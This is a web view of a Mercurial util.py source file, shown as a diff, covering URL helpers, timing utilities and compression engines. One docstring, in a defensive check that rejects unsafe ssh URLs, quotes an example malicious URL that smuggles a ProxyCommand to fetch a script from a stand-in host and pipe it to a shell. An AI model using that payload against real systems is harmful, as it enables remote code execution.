2945 2944 def hasdriveletter(path):
2946 2945 return path and path[1:2] == ':' and path[0:1].isalpha()
2947 2946
2948 2947 def urllocalpath(path):
2949 2948 return url(path, parsequery=False, parsefragment=False).localpath()
2950 2949
2951 2950 def checksafessh(path):
2952 2951 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2953 2952
2954 2953 This is a sanity check for ssh urls. ssh will parse the first item as
2955 2954 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2956 2955 Let's prevent these potentially exploited urls entirely and warn the
2957 2956 user.
2958 2957
2959 2958 Raises an error.Abort when the url is unsafe.
2960 2959 """
2961 2960 path = urlreq.unquote(path)
2962 2961 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2963 2962 raise error.Abort(_('potentially unsafe url: %r') %
2964 2963 (path,))
2965 2964
2966 2965 def hidepassword(u):
2967 2966 '''hide user credential in a url string'''
2968 2967 u = url(u)
2969 2968 if u.passwd:
2970 2969 u.passwd = '***'
2971 2970 return bytes(u)
2972 2971
2973 2972 def removeauth(u):
2974 2973 '''remove all authentication information from a url string'''
2975 2974 u = url(u)
2976 2975 u.user = u.passwd = None
2977 2976 return str(u)
2978 2977
2979 2978 timecount = unitcountfn(
2980 2979 (1, 1e3, _('%.0f s')),
2981 2980 (100, 1, _('%.1f s')),
2982 2981 (10, 1, _('%.2f s')),
2983 2982 (1, 1, _('%.3f s')),
2984 2983 (100, 0.001, _('%.1f ms')),
2985 2984 (10, 0.001, _('%.2f ms')),
2986 2985 (1, 0.001, _('%.3f ms')),
2987 2986 (100, 0.000001, _('%.1f us')),
2988 2987 (10, 0.000001, _('%.2f us')),
2989 2988 (1, 0.000001, _('%.3f us')),
2990 2989 (100, 0.000000001, _('%.1f ns')),
2991 2990 (10, 0.000000001, _('%.2f ns')),
2992 2991 (1, 0.000000001, _('%.3f ns')),
2993 2992 )
2994 2993
2995 2994 _timenesting = [0]
2996 2995
2997 2996 def timed(func):
2998 2997 '''Report the execution time of a function call to stderr.
2999 2998
3000 2999 During development, use as a decorator when you need to measure
3001 3000 the cost of a function, e.g. as follows:
3002 3001
3003 3002 @util.timed
3004 3003 def foo(a, b, c):
3005 3004 pass
3006 3005 '''
3007 3006
3008 3007 def wrapper(*args, **kwargs):
3009 3008 start = timer()
3010 3009 indent = 2
3011 3010 _timenesting[0] += indent
3012 3011 try:
3013 3012 return func(*args, **kwargs)
3014 3013 finally:
3015 3014 elapsed = timer() - start
3016 3015 _timenesting[0] -= indent
3017 3016 stderr.write('%s%s: %s\n' %
3018 3017 (' ' * _timenesting[0], func.__name__,
3019 3018 timecount(elapsed)))
3020 3019 return wrapper
3021 3020
3022 3021 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3023 3022 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3024 3023
3025 3024 def sizetoint(s):
3026 3025 '''Convert a space specifier to a byte count.
3027 3026
3028 3027 >>> sizetoint('30')
3029 3028 30
3030 3029 >>> sizetoint('2.2kb')
3031 3030 2252
3032 3031 >>> sizetoint('6M')
3033 3032 6291456
3034 3033 '''
3035 3034 t = s.strip().lower()
3036 3035 try:
3037 3036 for k, u in _sizeunits:
3038 3037 if t.endswith(k):
3039 3038 return int(float(t[:-len(k)]) * u)
3040 3039 return int(t)
3041 3040 except ValueError:
3042 3041 raise error.ParseError(_("couldn't parse size: %s") % s)
3043 3042
3044 3043 class hooks(object):
3045 3044 '''A collection of hook functions that can be used to extend a
3046 3045 function's behavior. Hooks are called in lexicographic order,
3047 3046 based on the names of their sources.'''
3048 3047
3049 3048 def __init__(self):
3050 3049 self._hooks = []
3051 3050
3052 3051 def add(self, source, hook):
3053 3052 self._hooks.append((source, hook))
3054 3053
3055 3054 def __call__(self, *args):
3056 3055 self._hooks.sort(key=lambda x: x[0])
3057 3056 results = []
3058 3057 for source, hook in self._hooks:
3059 3058 results.append(hook(*args))
3060 3059 return results
3061 3060
3062 3061 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3063 3062 '''Yields lines for a nicely formatted stacktrace.
3064 3063 Skips the 'skip' last entries, then return the last 'depth' entries.
3065 3064 Each file+linenumber is formatted according to fileline.
3066 3065 Each line is formatted according to line.
3067 3066 If line is None, it yields:
3068 3067 length of longest filepath+line number,
3069 3068 filepath+linenumber,
3070 3069 function
3071 3070
3072 3071 Not be used in production code but very convenient while developing.
3073 3072 '''
3074 3073 entries = [(fileline % (fn, ln), func)
3075 3074 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3076 3075 ][-depth:]
3077 3076 if entries:
3078 3077 fnmax = max(len(entry[0]) for entry in entries)
3079 3078 for fnln, func in entries:
3080 3079 if line is None:
3081 3080 yield (fnmax, fnln, func)
3082 3081 else:
3083 3082 yield line % (fnmax, fnln, func)
3084 3083
3085 3084 def debugstacktrace(msg='stacktrace', skip=0,
3086 3085 f=stderr, otherf=stdout, depth=0):
3087 3086 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3088 3087 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3089 3088 By default it will flush stdout first.
3090 3089 It can be used everywhere and intentionally does not require an ui object.
3091 3090 Not be used in production code but very convenient while developing.
3092 3091 '''
3093 3092 if otherf:
3094 3093 otherf.flush()
3095 3094 f.write('%s at:\n' % msg.rstrip())
3096 3095 for line in getstackframes(skip + 1, depth=depth):
3097 3096 f.write(line)
3098 3097 f.flush()
3099 3098
3100 3099 class dirs(object):
3101 3100 '''a multiset of directory names from a dirstate or manifest'''
3102 3101
3103 3102 def __init__(self, map, skip=None):
3104 3103 self._dirs = {}
3105 3104 addpath = self.addpath
3106 3105 if safehasattr(map, 'iteritems') and skip is not None:
3107 3106 for f, s in map.iteritems():
3108 3107 if s[0] != skip:
3109 3108 addpath(f)
3110 3109 else:
3111 3110 for f in map:
3112 3111 addpath(f)
3113 3112
3114 3113 def addpath(self, path):
3115 3114 dirs = self._dirs
3116 3115 for base in finddirs(path):
3117 3116 if base in dirs:
3118 3117 dirs[base] += 1
3119 3118 return
3120 3119 dirs[base] = 1
3121 3120
3122 3121 def delpath(self, path):
3123 3122 dirs = self._dirs
3124 3123 for base in finddirs(path):
3125 3124 if dirs[base] > 1:
3126 3125 dirs[base] -= 1
3127 3126 return
3128 3127 del dirs[base]
3129 3128
3130 3129 def __iter__(self):
3131 3130 return iter(self._dirs)
3132 3131
3133 3132 def __contains__(self, d):
3134 3133 return d in self._dirs
3135 3134
3136 3135 if safehasattr(parsers, 'dirs'):
3137 3136 dirs = parsers.dirs
3138 3137
3139 3138 def finddirs(path):
3140 3139 pos = path.rfind('/')
3141 3140 while pos != -1:
3142 3141 yield path[:pos]
3143 3142 pos = path.rfind('/', 0, pos)
3144 3143
3145 3144 # compression code
3146 3145
3147 3146 SERVERROLE = 'server'
3148 3147 CLIENTROLE = 'client'
3149 3148
3150 3149 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3151 3150 (u'name', u'serverpriority',
3152 3151 u'clientpriority'))
3153 3152
3154 3153 class compressormanager(object):
3155 3154 """Holds registrations of various compression engines.
3156 3155
3157 3156 This class essentially abstracts the differences between compression
3158 3157 engines to allow new compression formats to be added easily, possibly from
3159 3158 extensions.
3160 3159
3161 3160 Compressors are registered against the global instance by calling its
3162 3161 ``register()`` method.
3163 3162 """
3164 3163 def __init__(self):
3165 3164 self._engines = {}
3166 3165 # Bundle spec human name to engine name.
3167 3166 self._bundlenames = {}
3168 3167 # Internal bundle identifier to engine name.
3169 3168 self._bundletypes = {}
3170 3169 # Revlog header to engine name.
3171 3170 self._revlogheaders = {}
3172 3171 # Wire proto identifier to engine name.
3173 3172 self._wiretypes = {}
3174 3173
3175 3174 def __getitem__(self, key):
3176 3175 return self._engines[key]
3177 3176
3178 3177 def __contains__(self, key):
3179 3178 return key in self._engines
3180 3179
3181 3180 def __iter__(self):
3182 3181 return iter(self._engines.keys())
3183 3182
3184 3183 def register(self, engine):
3185 3184 """Register a compression engine with the manager.
3186 3185
3187 3186 The argument must be a ``compressionengine`` instance.
3188 3187 """
3189 3188 if not isinstance(engine, compressionengine):
3190 3189 raise ValueError(_('argument must be a compressionengine'))
3191 3190
3192 3191 name = engine.name()
3193 3192
3194 3193 if name in self._engines:
3195 3194 raise error.Abort(_('compression engine %s already registered') %
3196 3195 name)
3197 3196
3198 3197 bundleinfo = engine.bundletype()
3199 3198 if bundleinfo:
3200 3199 bundlename, bundletype = bundleinfo
3201 3200
3202 3201 if bundlename in self._bundlenames:
3203 3202 raise error.Abort(_('bundle name %s already registered') %
3204 3203 bundlename)
3205 3204 if bundletype in self._bundletypes:
3206 3205 raise error.Abort(_('bundle type %s already registered by %s') %
3207 3206 (bundletype, self._bundletypes[bundletype]))
3208 3207
3209 3208 # No external facing name declared.
3210 3209 if bundlename:
3211 3210 self._bundlenames[bundlename] = name
3212 3211
3213 3212 self._bundletypes[bundletype] = name
3214 3213
3215 3214 wiresupport = engine.wireprotosupport()
3216 3215 if wiresupport:
3217 3216 wiretype = wiresupport.name
3218 3217 if wiretype in self._wiretypes:
3219 3218 raise error.Abort(_('wire protocol compression %s already '
3220 3219 'registered by %s') %
3221 3220 (wiretype, self._wiretypes[wiretype]))
3222 3221
3223 3222 self._wiretypes[wiretype] = name
3224 3223
3225 3224 revlogheader = engine.revlogheader()
3226 3225 if revlogheader and revlogheader in self._revlogheaders:
3227 3226 raise error.Abort(_('revlog header %s already registered by %s') %
3228 3227 (revlogheader, self._revlogheaders[revlogheader]))
3229 3228
3230 3229 if revlogheader:
3231 3230 self._revlogheaders[revlogheader] = name
3232 3231
3233 3232 self._engines[name] = engine
3234 3233
3235 3234 @property
3236 3235 def supportedbundlenames(self):
3237 3236 return set(self._bundlenames.keys())
3238 3237
3239 3238 @property
3240 3239 def supportedbundletypes(self):
3241 3240 return set(self._bundletypes.keys())
3242 3241
3243 3242 def forbundlename(self, bundlename):
3244 3243 """Obtain a compression engine registered to a bundle name.
3245 3244
3246 3245 Will raise KeyError if the bundle type isn't registered.
3247 3246
3248 3247 Will abort if the engine is known but not available.
3249 3248 """
3250 3249 engine = self._engines[self._bundlenames[bundlename]]
3251 3250 if not engine.available():
3252 3251 raise error.Abort(_('compression engine %s could not be loaded') %
3253 3252 engine.name())
3254 3253 return engine
3255 3254
3256 3255 def forbundletype(self, bundletype):
3257 3256 """Obtain a compression engine registered to a bundle type.
3258 3257
3259 3258 Will raise KeyError if the bundle type isn't registered.
3260 3259
3261 3260 Will abort if the engine is known but not available.
3262 3261 """
3263 3262 engine = self._engines[self._bundletypes[bundletype]]
3264 3263 if not engine.available():
3265 3264 raise error.Abort(_('compression engine %s could not be loaded') %
3266 3265 engine.name())
3267 3266 return engine
3268 3267
3269 3268 def supportedwireengines(self, role, onlyavailable=True):
3270 3269 """Obtain compression engines that support the wire protocol.
3271 3270
3272 3271 Returns a list of engines in prioritized order, most desired first.
3273 3272
3274 3273 If ``onlyavailable`` is set, filter out engines that can't be
3275 3274 loaded.
3276 3275 """
3277 3276 assert role in (SERVERROLE, CLIENTROLE)
3278 3277
3279 3278 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3280 3279
3281 3280 engines = [self._engines[e] for e in self._wiretypes.values()]
3282 3281 if onlyavailable:
3283 3282 engines = [e for e in engines if e.available()]
3284 3283
3285 3284 def getkey(e):
3286 3285 # Sort first by priority, highest first. In case of tie, sort
3287 3286 # alphabetically. This is arbitrary, but ensures output is
3288 3287 # stable.
3289 3288 w = e.wireprotosupport()
3290 3289 return -1 * getattr(w, attr), w.name
3291 3290
3292 3291 return list(sorted(engines, key=getkey))
3293 3292
3294 3293 def forwiretype(self, wiretype):
3295 3294 engine = self._engines[self._wiretypes[wiretype]]
3296 3295 if not engine.available():
3297 3296 raise error.Abort(_('compression engine %s could not be loaded') %
3298 3297 engine.name())
3299 3298 return engine
3300 3299
3301 3300 def forrevlogheader(self, header):
3302 3301 """Obtain a compression engine registered to a revlog header.
3303 3302
3304 3303 Will raise KeyError if the revlog header value isn't registered.
3305 3304 """
3306 3305 return self._engines[self._revlogheaders[header]]
3307 3306
3308 3307 compengines = compressormanager()
3309 3308
3310 3309 class compressionengine(object):
3311 3310 """Base class for compression engines.
3312 3311
3313 3312 Compression engines must implement the interface defined by this class.
3314 3313 """
3315 3314 def name(self):
3316 3315 """Returns the name of the compression engine.
3317 3316
3318 3317 This is the key the engine is registered under.
3319 3318
3320 3319 This method must be implemented.
3321 3320 """
3322 3321 raise NotImplementedError()
3323 3322
3324 3323 def available(self):
3325 3324 """Whether the compression engine is available.
3326 3325
3327 3326 The intent of this method is to allow optional compression engines
3328 3327 that may not be available in all installations (such as engines relying
3329 3328 on C extensions that may not be present).
3330 3329 """
3331 3330 return True
3332 3331
3333 3332 def bundletype(self):
3334 3333 """Describes bundle identifiers for this engine.
3335 3334
3336 3335 If this compression engine isn't supported for bundles, returns None.
3337 3336
3338 3337 If this engine can be used for bundles, returns a 2-tuple of strings of
3339 3338 the user-facing "bundle spec" compression name and an internal
3340 3339 identifier used to denote the compression format within bundles. To
3341 3340 exclude the name from external usage, set the first element to ``None``.
3342 3341
3343 3342 If bundle compression is supported, the class must also implement
3344 3343 ``compressstream`` and `decompressorreader``.
3345 3344
3346 3345 The docstring of this method is used in the help system to tell users
3347 3346 about this engine.
3348 3347 """
3349 3348 return None
3350 3349
3351 3350 def wireprotosupport(self):
3352 3351 """Declare support for this compression format on the wire protocol.
3353 3352
3354 3353 If this compression engine isn't supported for compressing wire
3355 3354 protocol payloads, returns None.
3356 3355
3357 3356 Otherwise, returns ``compenginewireprotosupport`` with the following
3358 3357 fields:
3359 3358
3360 3359 * String format identifier
3361 3360 * Integer priority for the server
3362 3361 * Integer priority for the client
3363 3362
3364 3363 The integer priorities are used to order the advertisement of format
3365 3364 support by server and client. The highest integer is advertised
3366 3365 first. Integers with non-positive values aren't advertised.
3367 3366
3368 3367 The priority values are somewhat arbitrary and only used for default
3369 3368 ordering. The relative order can be changed via config options.
3370 3369
3371 3370 If wire protocol compression is supported, the class must also implement
3372 3371 ``compressstream`` and ``decompressorreader``.
3373 3372 """
3374 3373 return None
3375 3374
3376 3375 def revlogheader(self):
3377 3376 """Header added to revlog chunks that identifies this engine.
3378 3377
3379 3378 If this engine can be used to compress revlogs, this method should
3380 3379 return the bytes used to identify chunks compressed with this engine.
3381 3380 Else, the method should return ``None`` to indicate it does not
3382 3381 participate in revlog compression.
3383 3382 """
3384 3383 return None
3385 3384
3386 3385 def compressstream(self, it, opts=None):
3387 3386 """Compress an iterator of chunks.
3388 3387
3389 3388 The method receives an iterator (ideally a generator) of chunks of
3390 3389 bytes to be compressed. It returns an iterator (ideally a generator)
3391 3390 of bytes of chunks representing the compressed output.
3392 3391
3393 3392 Optionally accepts an argument defining how to perform compression.
3394 3393 Each engine treats this argument differently.
3395 3394 """
3396 3395 raise NotImplementedError()
3397 3396
3398 3397 def decompressorreader(self, fh):
3399 3398 """Perform decompression on a file object.
3400 3399
3401 3400 Argument is an object with a ``read(size)`` method that returns
3402 3401 compressed data. Return value is an object with a ``read(size)`` that
3403 3402 returns uncompressed data.
3404 3403 """
3405 3404 raise NotImplementedError()
3406 3405
3407 3406 def revlogcompressor(self, opts=None):
3408 3407 """Obtain an object that can be used to compress revlog entries.
3409 3408
3410 3409 The object has a ``compress(data)`` method that compresses binary
3411 3410 data. This method returns compressed binary data or ``None`` if
3412 3411 the data could not be compressed (too small, not compressible, etc).
3413 3412 The returned data should have a header uniquely identifying this
3414 3413 compression format so decompression can be routed to this engine.
3415 3414 This header should be identified by the ``revlogheader()`` return
3416 3415 value.
3417 3416
3418 3417 The object has a ``decompress(data)`` method that decompresses
3419 3418 data. The method will only be called if ``data`` begins with
3420 3419 ``revlogheader()``. The method should return the raw, uncompressed
3421 3420 data or raise a ``RevlogError``.
3422 3421
3423 3422 The object is reusable but is not thread safe.
3424 3423 """
3425 3424 raise NotImplementedError()
3426 3425
3427 3426 class _zlibengine(compressionengine):
3428 3427 def name(self):
3429 3428 return 'zlib'
3430 3429
3431 3430 def bundletype(self):
3432 3431 """zlib compression using the DEFLATE algorithm.
3433 3432
3434 3433 All Mercurial clients should support this format. The compression
3435 3434 algorithm strikes a reasonable balance between compression ratio
3436 3435 and size.
3437 3436 """
3438 3437 return 'gzip', 'GZ'
3439 3438
3440 3439 def wireprotosupport(self):
3441 3440 return compewireprotosupport('zlib', 20, 20)
3442 3441
3443 3442 def revlogheader(self):
3444 3443 return 'x'
3445 3444
3446 3445 def compressstream(self, it, opts=None):
3447 3446 opts = opts or {}
3448 3447
3449 3448 z = zlib.compressobj(opts.get('level', -1))
3450 3449 for chunk in it:
3451 3450 data = z.compress(chunk)
3452 3451 # Not all calls to compress emit data. It is cheaper to inspect
3453 3452 # here than to feed empty chunks through generator.
3454 3453 if data:
3455 3454 yield data
3456 3455
3457 3456 yield z.flush()
3458 3457
3459 3458 def decompressorreader(self, fh):
3460 3459 def gen():
3461 3460 d = zlib.decompressobj()
3462 3461 for chunk in filechunkiter(fh):
3463 3462 while chunk:
3464 3463 # Limit output size to limit memory.
3465 3464 yield d.decompress(chunk, 2 ** 18)
3466 3465 chunk = d.unconsumed_tail
3467 3466
3468 3467 return chunkbuffer(gen())
3469 3468
3470 3469 class zlibrevlogcompressor(object):
3471 3470 def compress(self, data):
3472 3471 insize = len(data)
3473 3472 # Caller handles empty input case.
3474 3473 assert insize > 0
3475 3474
3476 3475 if insize < 44:
3477 3476 return None
3478 3477
3479 3478 elif insize <= 1000000:
3480 3479 compressed = zlib.compress(data)
3481 3480 if len(compressed) < insize:
3482 3481 return compressed
3483 3482 return None
3484 3483
3485 3484 # zlib makes an internal copy of the input buffer, doubling
3486 3485 # memory usage for large inputs. So do streaming compression
3487 3486 # on large inputs.
3488 3487 else:
3489 3488 z = zlib.compressobj()
3490 3489 parts = []
3491 3490 pos = 0
3492 3491 while pos < insize:
3493 3492 pos2 = pos + 2**20
3494 3493 parts.append(z.compress(data[pos:pos2]))
3495 3494 pos = pos2
3496 3495 parts.append(z.flush())
3497 3496
3498 3497 if sum(map(len, parts)) < insize:
3499 3498 return ''.join(parts)
3500 3499 return None
3501 3500
3502 3501 def decompress(self, data):
3503 3502 try:
3504 3503 return zlib.decompress(data)
3505 3504 except zlib.error as e:
3506 3505 raise error.RevlogError(_('revlog decompress error: %s') %
3507 3506 str(e))
3508 3507
3509 3508 def revlogcompressor(self, opts=None):
3510 3509 return self.zlibrevlogcompressor()
3511 3510
3512 3511 compengines.register(_zlibengine())
3513 3512
3514 3513 class _bz2engine(compressionengine):
3515 3514 def name(self):
3516 3515 return 'bz2'
3517 3516
3518 3517 def bundletype(self):
3519 3518 """An algorithm that produces smaller bundles than ``gzip``.
3520 3519
3521 3520 All Mercurial clients should support this format.
3522 3521
3523 3522 This engine will likely produce smaller bundles than ``gzip`` but
3524 3523 will be significantly slower, both during compression and
3525 3524 decompression.
3526 3525
3527 3526 If available, the ``zstd`` engine can yield similar or better
3528 3527 compression at much higher speeds.
3529 3528 """
3530 3529 return 'bzip2', 'BZ'
3531 3530
3532 3531 # We declare a protocol name but don't advertise by default because
3533 3532 # it is slow.
3534 3533 def wireprotosupport(self):
3535 3534 return compewireprotosupport('bzip2', 0, 0)
3536 3535
3537 3536 def compressstream(self, it, opts=None):
3538 3537 opts = opts or {}
3539 3538 z = bz2.BZ2Compressor(opts.get('level', 9))
3540 3539 for chunk in it:
3541 3540 data = z.compress(chunk)
3542 3541 if data:
3543 3542 yield data
3544 3543
3545 3544 yield z.flush()
3546 3545
3547 3546 def decompressorreader(self, fh):
3548 3547 def gen():
3549 3548 d = bz2.BZ2Decompressor()
3550 3549 for chunk in filechunkiter(fh):
3551 3550 yield d.decompress(chunk)
3552 3551
3553 3552 return chunkbuffer(gen())
3554 3553
3555 3554 compengines.register(_bz2engine())
3556 3555
3557 3556 class _truncatedbz2engine(compressionengine):
3558 3557 def name(self):
3559 3558 return 'bz2truncated'
3560 3559
3561 3560 def bundletype(self):
3562 3561 return None, '_truncatedBZ'
3563 3562
3564 3563 # We don't implement compressstream because it is hackily handled elsewhere.
3565 3564
3566 3565 def decompressorreader(self, fh):
3567 3566 def gen():
3568 3567 # The input stream doesn't have the 'BZ' header. So add it back.
3569 3568 d = bz2.BZ2Decompressor()
3570 3569 d.decompress('BZ')
3571 3570 for chunk in filechunkiter(fh):
3572 3571 yield d.decompress(chunk)
3573 3572
3574 3573 return chunkbuffer(gen())
3575 3574
3576 3575 compengines.register(_truncatedbz2engine())
3577 3576
3578 3577 class _noopengine(compressionengine):
3579 3578 def name(self):
3580 3579 return 'none'
3581 3580
3582 3581 def bundletype(self):
3583 3582 """No compression is performed.
3584 3583
3585 3584 Use this compression engine to explicitly disable compression.
3586 3585 """
3587 3586 return 'none', 'UN'
3588 3587
3589 3588 # Clients always support uncompressed payloads. Servers don't because
3590 3589 # unless you are on a fast network, uncompressed payloads can easily
3591 3590 # saturate your network pipe.
3592 3591 def wireprotosupport(self):
3593 3592 return compewireprotosupport('none', 0, 10)
3594 3593
3595 3594 # We don't implement revlogheader because it is handled specially
3596 3595 # in the revlog class.
3597 3596
3598 3597 def compressstream(self, it, opts=None):
3599 3598 return it
3600 3599
3601 3600 def decompressorreader(self, fh):
3602 3601 return fh
3603 3602
3604 3603 class nooprevlogcompressor(object):
3605 3604 def compress(self, data):
3606 3605 return None
3607 3606
3608 3607 def revlogcompressor(self, opts=None):
3609 3608 return self.nooprevlogcompressor()
3610 3609
3611 3610 compengines.register(_noopengine())
3612 3611
3613 3612 class _zstdengine(compressionengine):
3614 3613 def name(self):
3615 3614 return 'zstd'
3616 3615
3617 3616 @propertycache
3618 3617 def _module(self):
3619 3618 # Not all installs have the zstd module available. So defer importing
3620 3619 # until first access.
3621 3620 try:
3622 3621 from . import zstd
3623 3622 # Force delayed import.
3624 3623 zstd.__version__
3625 3624 return zstd
3626 3625 except ImportError:
3627 3626 return None
3628 3627
3629 3628 def available(self):
3630 3629 return bool(self._module)
3631 3630
3632 3631 def bundletype(self):
3633 3632 """A modern compression algorithm that is fast and highly flexible.
3634 3633
3635 3634 Only supported by Mercurial 4.1 and newer clients.
3636 3635
3637 3636 With the default settings, zstd compression is both faster and yields
3638 3637 better compression than ``gzip``. It also frequently yields better
3639 3638 compression than ``bzip2`` while operating at much higher speeds.
3640 3639
3641 3640 If this engine is available and backwards compatibility is not a
3642 3641 concern, it is likely the best available engine.
3643 3642 """
3644 3643 return 'zstd', 'ZS'
3645 3644
3646 3645 def wireprotosupport(self):
3647 3646 return compewireprotosupport('zstd', 50, 50)
3648 3647
3649 3648 def revlogheader(self):
3650 3649 return '\x28'
3651 3650
3652 3651 def compressstream(self, it, opts=None):
3653 3652 opts = opts or {}
3654 3653 # zstd level 3 is almost always significantly faster than zlib
3655 3654 # while providing no worse compression. It strikes a good balance
3656 3655 # between speed and compression.
3657 3656 level = opts.get('level', 3)
3658 3657
3659 3658 zstd = self._module
3660 3659 z = zstd.ZstdCompressor(level=level).compressobj()
3661 3660 for chunk in it:
3662 3661 data = z.compress(chunk)
3663 3662 if data:
3664 3663 yield data
3665 3664
3666 3665 yield z.flush()
3667 3666
3668 3667 def decompressorreader(self, fh):
3669 3668 zstd = self._module
3670 3669 dctx = zstd.ZstdDecompressor()
3671 3670 return chunkbuffer(dctx.read_from(fh))
3672 3671
3673 3672 class zstdrevlogcompressor(object):
3674 3673 def __init__(self, zstd, level=3):
3675 3674 # Writing the content size adds a few bytes to the output. However,
3676 3675 # it allows decompression to be more optimal since we can
3677 3676 # pre-allocate a buffer to hold the result.
3678 3677 self._cctx = zstd.ZstdCompressor(level=level,
3679 3678 write_content_size=True)
3680 3679 self._dctx = zstd.ZstdDecompressor()
3681 3680 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3682 3681 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3683 3682
3684 3683 def compress(self, data):
3685 3684 insize = len(data)
3686 3685 # Caller handles empty input case.
3687 3686 assert insize > 0
3688 3687
3689 3688 if insize < 50:
3690 3689 return None
3691 3690
3692 3691 elif insize <= 1000000:
3693 3692 compressed = self._cctx.compress(data)
3694 3693 if len(compressed) < insize:
3695 3694 return compressed
3696 3695 return None
3697 3696 else:
3698 3697 z = self._cctx.compressobj()
3699 3698 chunks = []
3700 3699 pos = 0
3701 3700 while pos < insize:
3702 3701 pos2 = pos + self._compinsize
3703 3702 chunk = z.compress(data[pos:pos2])
3704 3703 if chunk:
3705 3704 chunks.append(chunk)
3706 3705 pos = pos2
3707 3706 chunks.append(z.flush())
3708 3707
3709 3708 if sum(map(len, chunks)) < insize:
3710 3709 return ''.join(chunks)
3711 3710 return None
3712 3711
3713 3712 def decompress(self, data):
3714 3713 insize = len(data)
3715 3714
3716 3715 try:
3717 3716 # This was measured to be faster than other streaming
3718 3717 # decompressors.
3719 3718 dobj = self._dctx.decompressobj()
3720 3719 chunks = []
3721 3720 pos = 0
3722 3721 while pos < insize:
3723 3722 pos2 = pos + self._decompinsize
3724 3723 chunk = dobj.decompress(data[pos:pos2])
3725 3724 if chunk:
3726 3725 chunks.append(chunk)
3727 3726 pos = pos2
3728 3727 # Frame should be exhausted, so no finish() API.
3729 3728
3730 3729 return ''.join(chunks)
3731 3730 except Exception as e:
3732 3731 raise error.RevlogError(_('revlog decompress error: %s') %
3733 3732 str(e))
3734 3733
3735 3734 def revlogcompressor(self, opts=None):
3736 3735 opts = opts or {}
3737 3736 return self.zstdrevlogcompressor(self._module,
3738 3737 level=opts.get('level', 3))
3739 3738
3740 3739 compengines.register(_zstdengine())
3741 3740
3742 3741 def bundlecompressiontopics():
3743 3742 """Obtains a list of available bundle compressions for use in help."""
3744 3743 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3745 3744 items = {}
3746 3745
3747 3746 # We need to format the docstring. So use a dummy object/type to hold it
3748 3747 # rather than mutating the original.
3749 3748 class docobject(object):
3750 3749 pass
3751 3750
3752 3751 for name in compengines:
3753 3752 engine = compengines[name]
3754 3753
3755 3754 if not engine.available():
3756 3755 continue
3757 3756
3758 3757 bt = engine.bundletype()
3759 3758 if not bt or not bt[0]:
3760 3759 continue
3761 3760
3762 3761 doc = pycompat.sysstr('``%s``\n %s') % (
3763 3762 bt[0], engine.bundletype.__doc__)
3764 3763
3765 3764 value = docobject()
3766 3765 value.__doc__ = doc
3767 3766 value._origdoc = engine.bundletype.__doc__
3768 3767 value._origfunc = engine.bundletype
3769 3768
3770 3769 items[bt[0]] = value
3771 3770
3772 3771 return items
3773 3772
3774 3773 i18nfunctions = bundlecompressiontopics().values()
3775 3774
3776 3775 # convenient shortcut
3777 3776 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now